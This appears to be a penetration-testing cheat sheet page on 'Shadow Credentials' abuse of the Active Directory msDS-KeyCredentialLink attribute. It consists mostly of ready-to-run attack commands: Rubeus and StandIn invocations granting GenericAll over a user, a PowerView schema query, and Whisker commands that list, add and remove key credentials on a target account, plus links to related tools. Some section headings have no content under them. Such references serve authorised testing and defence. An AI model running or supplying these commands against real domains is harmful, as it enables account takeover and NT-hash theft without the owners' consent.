Key Credentials Abuse

"...if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user." (Elad Shamir, ref)

That makes GenericWrite on a user effectively equal to DCSync right on that user.

Cmd > Rubeus.exe createnetonly /program:cmd.exe /show /ticket:tgt.kirbi
Cmd > StandIn.exe --domain megacorp.local --object "samaccountname=snovvcrash" --grant "MEGACORP\jdoe" --type GenericAll

Check for existence of the msDS-KeyCredentialLink property in LDAP scheme with powerview.py:

PS > Get-DomainObject -SearchBase CN=Schema,CN=Configuration,DC=megacorp,DC=local -Properties lDAPDisplayName -Where "lDAPDisplayName contains msDS-KeyCredentialLink"

Whisker

• https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab

• https://github.com/eladshamir/Whisker

List all the values of the the msDS-KeyCredentialLink attribute of a target object:

Cmd > .\Whisker.exe list /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local

Add a new value to the msDS-KeyCredentialLink attribute of a target object:

Cmd > .\Whisker.exe add /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /path:C:\Temp\cert.pfx /password:Passw0rd!

Remove a value from the msDS-KeyCredentialLink attribute of a target object:

Cmd > .\Whisker.exe remove /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /deviceid:00ff00ff-00ff-00ff-00ff-00ff00ff00ff

Clear all the values of the the msDS-KeyCredentialLink attribute of a target object:

pywhisker

• https://github.com/ShutdownRepo/pywhisker

• https://podalirius.net/en/articles/parsing-the-msds-keycredentiallink-value-for-shadowcredentials-attack/

Certipy

Tools

• https://github.com/MichaelGrafnetter/DSInternals/blob/master/Documentation/PowerShell/Get-ADKeyCredential.md

• https://github.com/RedTeamPentesting/keycred